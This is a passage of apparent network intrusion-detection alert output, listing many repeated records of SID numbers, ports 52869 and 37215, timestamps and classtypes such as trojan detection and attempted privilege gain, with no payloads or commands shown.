                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:48.701127
                      SID:2831300
                      Source Port:53308
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:02.066908
                      SID:2835222
                      Source Port:51714
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.479085
                      SID:2025132
                      Source Port:33450
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:03.422401
                      SID:2025132
                      Source Port:53670
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:42.111275
                      SID:2027339
                      Source Port:52826
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.196522
                      SID:2027339
                      Source Port:53258
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.924014
                      SID:2027339
                      Source Port:49876
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.991829
                      SID:2831300
                      Source Port:34298
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:45.109699
                      SID:2025132
                      Source Port:40610
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:44.452219
                      SID:2027339
                      Source Port:48536
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.685722
                      SID:2831300
                      Source Port:38056
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:45.188773
                      SID:2831300
                      Source Port:40180
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:24.944299
                      SID:2829579
                      Source Port:60742
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:13.583885
                      SID:2025132
                      Source Port:58320
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:47.902509
                      SID:2025132
                      Source Port:49078
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:50.313415
                      SID:2027339
                      Source Port:38028
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:50.093097
                      SID:2831300
                      Source Port:40554
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:44.277250
                      SID:2831300
                      Source Port:45600
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:02:20.374641
                      SID:2027339
                      Source Port:38620
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:34.044537
                      SID:2829579
                      Source Port:50196
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.187124
                      SID:2027339
                      Source Port:49100
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:51.016561
                      SID:2025132
                      Source Port:46870
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:31.986571
                      SID:2835222
                      Source Port:56050
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:47.403768
                      SID:2025132
                      Source Port:58964
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:21.928521
                      SID:2835222
                      Source Port:42742
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:46.004063
                      SID:2025132
                      Source Port:40942
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:46.485082
                      SID:2831300
                      Source Port:56676
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:11.662969
                      SID:2829579
                      Source Port:48664
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:11.635828
                      SID:2829579
                      Source Port:60566
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.276860
                      SID:2831300
                      Source Port:34986
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:24.889163
                      SID:2835222
                      Source Port:54718
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:05.007557
                      SID:2027339
                      Source Port:54884
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:34.046616
                      SID:2829579
                      Source Port:60776
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.533244
                      SID:2027339
                      Source Port:57514
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:53.281781
                      SID:2831300
                      Source Port:39014
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:40.307219
                      SID:2835222
                      Source Port:47256
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.290838
                      SID:2027339
                      Source Port:43356
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:56.768240
                      SID:2831300
                      Source Port:43520
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:43.071126
                      SID:2027339
                      Source Port:42976
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.452336
                      SID:2831300
                      Source Port:39466
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:08.693187
                      SID:2027339
                      Source Port:41122
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.430595
                      SID:2027339
                      Source Port:46182
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.050503
                      SID:2835222
                      Source Port:38646
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.432131
                      SID:2025132
                      Source Port:33560
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:24.916250
                      SID:2829579
                      Source Port:59300
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:27.653309
                      SID:2835222
                      Source Port:56710
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:51.056493
                      SID:2025132
                      Source Port:36906
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:43.895587
                      SID:2027339
                      Source Port:33518
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.930628
                      SID:2025132
                      Source Port:40272
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:48.386032
                      SID:2025132
                      Source Port:54594
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:01.473903
                      SID:2025132
                      Source Port:52872
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:42.670071
                      SID:2027339
                      Source Port:55124
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:48.108304
                      SID:2831300
                      Source Port:43398
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:08.598416
                      SID:2027339
                      Source Port:38364
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.488676
                      SID:2025132
                      Source Port:47140
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:42.325814
                      SID:2027339
                      Source Port:35148
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:46.247879
                      SID:2025132
                      Source Port:45630
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:45.096837
                      SID:2027339
                      Source Port:41926
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:24.862410
                      SID:2835222
                      Source Port:51818
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:06.975117
                      SID:2835222
                      Source Port:45108
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.703494
                      SID:2027339
                      Source Port:46836
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.845332
                      SID:2831300
                      Source Port:36896
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:02.083467
                      SID:2829579
                      Source Port:60660
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.915640
                      SID:2027339
                      Source Port:32862
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.290281
                      SID:2027339
                      Source Port:60796
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:56.327422
                      SID:2027339
                      Source Port:52236
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:13.811792
                      SID:2025132
                      Source Port:37034
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:08.638880
                      SID:2027339
                      Source Port:38024
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:25.476673
                      SID:2027339
                      Source Port:39008
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:47.342227
                      SID:2027339
                      Source Port:38380
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.855022
                      SID:2831300
                      Source Port:35600
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:00:59.203960
                      SID:2835222
                      Source Port:37906
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:10.691725
                      SID:2027339
                      Source Port:52688
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.622797
                      SID:2025132
                      Source Port:50476
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:44.481011
                      SID:2027339
                      Source Port:43510
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.598416
                      SID:2831300
                      Source Port:57734
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:34.048618
                      SID:2829579
                      Source Port:58204
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.034156
                      SID:2027339
                      Source Port:58954
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:09.758048
                      SID:2027339
                      Source Port:53308
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:52.286078
                      SID:2027339
                      Source Port:55492
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:48.156942
                      SID:2025132
                      Source Port:46730
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:43.918137
                      SID:2025132
                      Source Port:35604
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:02.426129
                      SID:2027339
                      Source Port:48472
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:48.855306
                      SID:2831300
                      Source Port:59376
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:49.703914
                      SID:2025132
                      Source Port:41410
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:41.290518
                      SID:2025132
                      Source Port:41866
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:54.835427
                      SID:2027339
                      Source Port:51488
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.295717
                      SID:2025132
                      Source Port:41290
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:12.813695
                      SID:2831300
                      Source Port:57422
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:41.286911
                      SID:2027339
                      Source Port:52456
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.126052
                      SID:2829579
                      Source Port:38742
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.591702
                      SID:2831300
                      Source Port:35926
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:44.826234
                      SID:2027339
                      Source Port:42172
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.663244
                      SID:2831300
                      Source Port:41736
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:52.081188
                      SID:2025132
                      Source Port:40076
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:53.068033
                      SID:2025132
                      Source Port:37484
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:00:59.163619
                      SID:2829579
                      Source Port:50560
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.637960
                      SID:2027339
                      Source Port:40706
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:08.008782
                      SID:2027339
                      Source Port:37426
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:27.655551
                      SID:2829579
                      Source Port:54210
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.578116
                      SID:2027339
                      Source Port:44384
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:59.593868
                      SID:2025132
                      Source Port:46206
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:51.244491
                      SID:2025132
                      Source Port:45482
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:04.802341
                      SID:2027339
                      Source Port:35090
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:08.781934
                      SID:2027339
                      Source Port:42460
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:00.633744
                      SID:2829579
                      Source Port:37642
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.565131
                      SID:2831300
                      Source Port:41940
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:02:06.813916
                      SID:2027339
                      Source Port:34864
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.312736
                      SID:2831300
                      Source Port:45590
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:43.175740
                      SID:2831300
                      Source Port:53954
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:45.980258
                      SID:2831300
                      Source Port:32840
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:47.808098
                      SID:2025132
                      Source Port:44152
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:25.974900
                      SID:2027339
                      Source Port:39232
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:57.720327
                      SID:2027339
                      Source Port:49880
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:07.066373
                      SID:2829579
                      Source Port:40944
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:58.624224
                      SID:2831300
                      Source Port:54392
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:42.751499
                      SID:2027339
                      Source Port:48762
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:53.059915
                      SID:2025132
                      Source Port:47832
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:45.713934
                      SID:2027339
                      Source Port:47396
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:56.910590
                      SID:2831300
                      Source Port:37840
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:47.748808
                      SID:2027339
                      Source Port:33308
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:46.125172
                      SID:2027339
                      Source Port:56968
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:34.050313
                      SID:2835222
                      Source Port:37428
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.546338
                      SID:2027339
                      Source Port:57954
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:51.932550
                      SID:2831300
                      Source Port:35906
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:42.142802
                      SID:2025132
                      Source Port:46616
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:55.384732
                      SID:2025132
                      Source Port:51482
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:00:59.211046
                      SID:2829579
                      Source Port:33444
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:03.942398
                      SID:2027339
                      Source Port:34136
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:12.807585
                      SID:2027339
                      Source Port:37972
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.027932
                      SID:2027339
                      Source Port:40596
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.320661
                      SID:2831300
                      Source Port:34236
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:02.048113
                      SID:2835222
                      Source Port:42374
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.328791
                      SID:2027339
                      Source Port:49800
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.143033
                      SID:2027339
                      Source Port:37250
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:53.354788
                      SID:2027339
                      Source Port:40962
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.939279
                      SID:2027339
                      Source Port:33890
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:52.161851
                      SID:2027339
                      Source Port:50178
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.098909
                      SID:2835222
                      Source Port:46330
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.629616
                      SID:2027339
                      Source Port:44946
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:27.650643
                      SID:2829579
                      Source Port:50680
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:50.001370
                      SID:2831300
                      Source Port:36896
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:00:57.222523
                      SID:2835222
                      Source Port:49446
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:11.818830
                      SID:2829579
                      Source Port:47376
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:50.065539
                      SID:2027339
                      Source Port:34878
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.031511
                      SID:2829579
                      Source Port:35524
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.630327
                      SID:2027339
                      Source Port:46392
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:12.853279
                      SID:2831300
                      Source Port:52536
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:45.521019
                      SID:2027339
                      Source Port:34432
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:47.562957
                      SID:2025132
                      Source Port:37252
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:34.050313
                      SID:2835222
                      Source Port:43576
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.591702
                      SID:2027339
                      Source Port:40612
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:24.876750
                      SID:2829579
                      Source Port:37540
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:53.132473
                      SID:2027339
                      Source Port:43602
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:26.115620
                      SID:2027339
                      Source Port:51190
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.498156
                      SID:2027339
                      Source Port:47550
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.683079
                      SID:2831300
                      Source Port:38692
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:44.439012
                      SID:2027339
                      Source Port:48844
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:01.404325
                      SID:2027339
                      Source Port:54976
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.340422
                      SID:2027339
                      Source Port:39600
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.305474
                      SID:2027339
                      Source Port:50966
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:46.571223
                      SID:2831300
                      Source Port:34950
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:40.321300
                      SID:2829579
                      Source Port:54292
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:48.901809
                      SID:2831300
                      Source Port:34252
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:51.576561
                      SID:2027339
                      Source Port:49878
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:47.455724
                      SID:2831300
                      Source Port:60998
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:51.835178
                      SID:2027339
                      Source Port:38042
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:03.270954
                      SID:2027339
                      Source Port:41386
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.084243
                      SID:2025132
                      Source Port:49044
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:49.033216
                      SID:2025132
                      Source Port:47750
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:24.882291
                      SID:2829579
                      Source Port:49764
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.639622
                      SID:2831300
                      Source Port:50874
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:47.117979
                      SID:2025132
                      Source Port:37426
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:14.146543
                      SID:2027339
                      Source Port:45488
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:52.720788
                      SID:2027339
                      Source Port:56934
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:51.086033
                      SID:2027339
                      Source Port:59050
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:03.834044
                      SID:2025132
                      Source Port:57978
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:05.000501
                      SID:2025132
                      Source Port:39416
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:41.328263
                      SID:2025132
                      Source Port:35892
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:34.060991
                      SID:2835222
